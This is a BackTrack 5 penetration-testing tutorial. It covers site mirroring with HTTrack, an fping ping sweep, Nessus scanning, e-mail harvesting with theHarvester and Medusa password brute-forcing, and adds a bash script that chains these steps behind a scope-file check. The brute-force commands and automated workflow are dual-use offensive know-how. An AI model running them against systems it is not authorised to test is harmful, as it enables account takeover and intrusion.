Download link – www.backtrack-linux.org/downloads
BackTrack 5 tutorial:
BackTrack was an Ubuntu-based Linux distribution aimed at digital forensics and penetration testing. It has since been superseded by Kali Linux: in March 2013 the Offensive Security team rebuilt BackTrack on Debian and released it under the name Kali Linux.
BackTrack gave users easy access to a large collection of security-related tools, from port scanners to vulnerability scanners and audit tools. Live CD and Live USB support let users boot BackTrack directly from portable media without installing it, though permanent installation to a hard disk or a network install was also an option.
BackTrack included many well known security tools including:
- Metasploit Framework integration
- Wi-Fi drivers supporting monitor mode (rfmon mode) and packet injection
- Aircrack-ng
- Gerix Wifi Cracker
- Kismet
- Nmap
- Ophcrack
- Ettercap
- Wireshark (formerly known as Ethereal)
- BeEF (Browser Exploitation Framework)
- Hydra
- OWASP Mantra Security Framework, a collection of hacking tools, add-ons and scripts based on Firefox
- Cisco OCS Mass Scanner, a fast scanner that finds Cisco routers with Telnet open and the default password still set.
- A large collection of exploits as well as more commonplace software such as browsers.
BackTrack arranged tools into 12 categories:
- Information gathering
- Vulnerability assessment
- Exploitation tools
- Privilege escalation
- Maintaining access
- Reverse engineering
- RFID tools
- Stress testing
- Forensics
- Reporting tools
- Services
- Miscellaneous
>> penetration testing with Backtrack 5
Step 1 – Reconnaissance
Before we get going with the actual penetration testing, we want to install a free program called “HTTrack” from the BackTrack 5 console. Open a terminal and enter “apt-get install httrack” (BackTrack runs as root, so no sudo is needed). Once that’s done, type “httrack” to start it. This program mirrors all of the pages of a given site to local disk before the actual testing starts. This means you won’t be digging around a live site and wasting precious time, and you don’t run the risk of being blocked by the server before you get what you need. Keep in mind that a full mirror generates a lot of requests, so only point it at a site you are authorised to test. If you do get blocked later you would need this tool anyway, so it’s best to play it safe and use it from the beginning.
Next, HTTrack asks for a project name (you can leave it blank if you want) and for the URL of the website to copy. Hit enter and you’ll be given a list of options; to mirror the entire website, simply press “1”. Give it a few minutes and you’ll have a local copy of the entire site’s contents.
There are also tools that repeat this process for sub-domains and e-mail addresses. We aren’t going to cover that here because it is more of a convenience and isn’t strictly necessary. With that said, it’s time to move on to Step 2!
Step 2 – Scan The Site
Step 2 is also our favourite step. It’s the actual scanning process and, quite frankly, one of the least complicated steps. The first way to scan the site in question is with a ping sweep. To do this, enter the following command into the terminal and wait for the results.
The command: fping -a -g 192.0.2.1 192.0.2.254 > hosts.txt
Now, in that command you’ll notice some odd-looking numbers. Those are sample IP addresses, taken from a range reserved for documentation, so they don’t belong to any real site; replace them with the real address range of the site you are performing penetration testing on. What the ping sweep does is send an ICMP echo request to every address from IP address A to IP address B; the -a flag prints only the hosts that answered, and the redirect saves that list to hosts.txt. Bear in mind that hosts behind a firewall that drops ICMP will not show up here, so an empty result does not mean nothing is there. Make sense?
Once you have these results, we recommend running a vulnerability scan. To do this, enter this code:
root@bt:~# apt-get install nessus
Once it is installed, start it from the menu: click Applications, BackTrack, Vulnerability Assessment, Vulnerability Scanner, Nessus, and finally Nessus Start, then point a browser at https://127.0.0.1:8834 and log in. Note that Nessus needs an activation code (a free HomeFeed code at the time) registered before it will download its plugins and scan anything, so sort that out first. Then, you wait.
Before you move on to Step 3, we have an additional recommendation that isn’t necessary but will help. You can easily catalog both e-mail addresses and sub-domains associated with the website in question with a simple Python script called “theHarvester”. It is already on your BackTrack 5 system; type the following into your console to get going:
root@bt:~# cd /pentest/enumeration/theharvester
root@bt:/pentest/enumeration/theharvester# ./theHarvester.py -d (your site here) -l 10 -b google
Now, see where we entered google as the data source? The -b option takes the name of a source, not a URL, and you can use any source the script supports (bing and linkedin are other common choices; run the script without arguments to list them). The -l option caps the number of results. Basically what this does is search a public resource (a search engine) for e-mail addresses and sub-domains associated with the domain you enter. Again, this isn’t necessary, but it gives you additional information on the site and additional resources that will come in handy when it comes time for the exploitation step. Ready to move on?
Step 3 – Exploit The Site In Question
Now we’re at the stage where we’re going to attempt to exploit the site, which is probably what most of you have been waiting for. In other words, it’s crunch time! The first thing you need to do is make sure Medusa is installed. BackTrack 5 ships with Medusa, but just in case it isn’t there, open your console and type “apt-get update” followed by “apt-get install medusa”. That should take care of it for you.
Now, before we move on, keep one thing in mind. Many services lock an account out after too many wrong password guesses, and no tool gets around that; the only real protection is to keep the number of guesses small and spread out (Medusa’s -t option limits how many logins run in parallel). To improve your odds, use a good word list: BackTrack keeps several under /pentest/passwords/wordlists (run “ls /pentest/passwords/wordlists” to see them), and Medusa will try each entry in the list you pick as a password. To get started, enter the command below against the server.
medusa -h <target ip> -u <username> -P <path to password list> -M <service module>
To make better sense of what you’re reading above, here is the breakdown. The -h is the IP address of the target host (many sites share an IP these days, so check that the service you hit really belongs to the site you are testing; -H takes a file of hosts instead).
The -u is the single username to try when logging in (-U takes a file of usernames). The -P specifies the list of possible passwords (lowercase -p would be a single password). The -M selects the service module to attack, for example ssh, ftp, or http; run “medusa -d” to list the modules installed. While this may sound complicated to those of you who have never used BackTrack 5 and are coming to this tutorial with no experience whatsoever, it really isn’t. It will take a little practice, but after a few attempts (on your own systems, or ones you have written permission to test) you’ll get it down. Once you’ve messed with this some and are familiar with it, move on to Step 4.
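The three steps above, put together in one script, as an added example that is not part of the original tutorial and not code from the BackTrack project. It runs the HTTrack mirror, the fping sweep, theHarvester and Medusa in order, but only after checking that the target appears in a scope file, so a typo in an address never hits a host you are not authorised to test. The scope-file format, the output directory layout, the choice of SSH as the Medusa module, the darkc0de.lst word list and the users.txt file name are all assumptions of this example, not things the page states.

```shell
#!/bin/bash
# Added example, not code from the original tutorial: the Step 1-3 workflow
# (HTTrack mirror, fping sweep, theHarvester, Medusa) wrapped in one script
# with an explicit scope check. Assumptions that are mine, not the page's:
# the scope-file format, the output directory layout, SSH as the Medusa
# module, the darkc0de.lst word list and the users.txt file name.
set -u

# in_scope IP SCOPEFILE: succeed only if IP is listed verbatim in the scope
# file (one address per line, '#' comments allowed). -F -x makes it an exact
# whole-line match, so 192.0.2.1 does not match 192.0.2.10.
in_scope() {
    grep -v '^#' "$2" | grep -Fqx "$1"
}

# alive_hosts: filter `fping -a` output on stdin down to unique dotted quads.
# fping sends ICMP errors to stderr, but filtering stdout too is cheap insurance.
alive_hosts() {
    grep -E '^([0-9]{1,3}\.){3}[0-9]{1,3}$' | sort -u
}

# sweep_range IP: print "first last" for the /24 that contains IP, which is
# the pair of arguments fping -g expects for a ping sweep.
sweep_range() {
    local net="${1%.*}"
    printf '%s.1 %s.254\n' "$net" "$net"
}

# main TARGET_IP DOMAIN [SCOPEFILE]: run the three steps in order.
main() {
    [ $# -ge 2 ] || { echo "usage: $0 --run <target-ip> <domain> [scope-file]" >&2; return 1; }
    local target_ip="$1" domain="$2" scope="${3:-scope.txt}" tool out
    in_scope "$target_ip" "$scope" || { echo "refusing: $target_ip is not in $scope" >&2; return 1; }
    for tool in httrack fping medusa; do
        command -v "$tool" >/dev/null || { echo "missing tool: $tool" >&2; return 1; }
    done
    out="engagement-$(date +%Y%m%d)"
    mkdir -p "$out"

    # Step 1: offline mirror. -r3 caps the recursion depth and -c2 keeps the
    # number of parallel connections low so the mirror is not a flood.
    httrack "http://$domain/" -O "$out/mirror" -r3 -c2 -q

    # Step 2: ping sweep of the target's /24, keeping only hosts that answered.
    # shellcheck disable=SC2046  (sweep_range deliberately yields two words)
    fping -a -g $(sweep_range "$target_ip") 2>/dev/null | alive_hosts > "$out/hosts.txt"

    # Step 2, optional: e-mail addresses and sub-domains from a search engine.
    if [ -x /pentest/enumeration/theharvester/theHarvester.py ]; then
        (cd /pentest/enumeration/theharvester && ./theHarvester.py -d "$domain" -l 100 -b bing) \
            > "$out/harvester.txt"
    fi

    # Step 3: one throttled Medusa run per live host that is also in scope.
    # -U/-P read users and passwords from files, -t 2 limits parallel logins,
    # -f stops on the first valid pair per host, -O logs to a file.
    while read -r host; do
        in_scope "$host" "$scope" || continue
        medusa -h "$host" -U users.txt -P /pentest/passwords/wordlists/darkc0de.lst \
               -M ssh -t 2 -f -O "$out/medusa-$host.log"
    done < "$out/hosts.txt"
}

# Only run the workflow when invoked as: ./bt5-workflow.sh --run <ip> <domain> [scope.txt]
if [ "${1:-}" = "--run" ]; then
    shift
    main "$@"
fi
```

The scope check is applied twice on purpose: once to the address you pass in, and again to every host the sweep turns up, because a /24 sweep will happily list neighbours that belong to someone else. The helper functions are kept separate from main so they can be exercised without the tools installed.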
Step 4 – Compile Results
Now that you’ve gone through the first three basic steps, from reconnaissance to exploiting the site, you’re ready to compile your results. Were you able to access the server or website in question? Were you locked out because of too many password attempts? Were you able to get around that? These are all questions you should ask yourself when using BackTrack 5. As mentioned above, this takes a little practice and some getting used to, but it’s not a hard piece of software to master.
Best of all, it’s a very valuable piece of software that could save you or your business a lot of money down the road. If you can get into your own website or server with BackTrack 5, then so can an attacker, and you’re at high risk of being hacked. If you store credit card numbers or confidential information on your site, you definitely don’t want that to happen. While this is only a basic BackTrack 5 tutorial that outlines the bare essentials of using the software, there is still a lot to learn. Whether you seek out a quality BackTrack 5 course or teach yourself, you’ll find it a rewarding, challenging, and technical experience. On top of that, you’ll learn sound security practices that will help you keep your sites and networks safe from attackers.
One last thing before you go: keep the system up to date. Before each session, run:
root@bt:~# apt-get update && apt-get upgrade && apt-get dist-upgrade
This makes sure you have all the available updates and are ready to go the next time you use the software. Many people overlook this step, but we think it’s an important one: the updates are free, they fix bugs and security holes in the tools and in the base system, and there’s no good excuse not to take them. BackTrack 5 is built on Ubuntu, so updates come out fairly often; you may want to run this more than once a week, and for the most part it is quick.
So, with that said, run that command before each session of BackTrack 5. It may not get you every update the moment it is released, but it does ensure you are current before you start working. Simple enough? Now all that’s left is to polish your skills, keep your software updated, and get to work!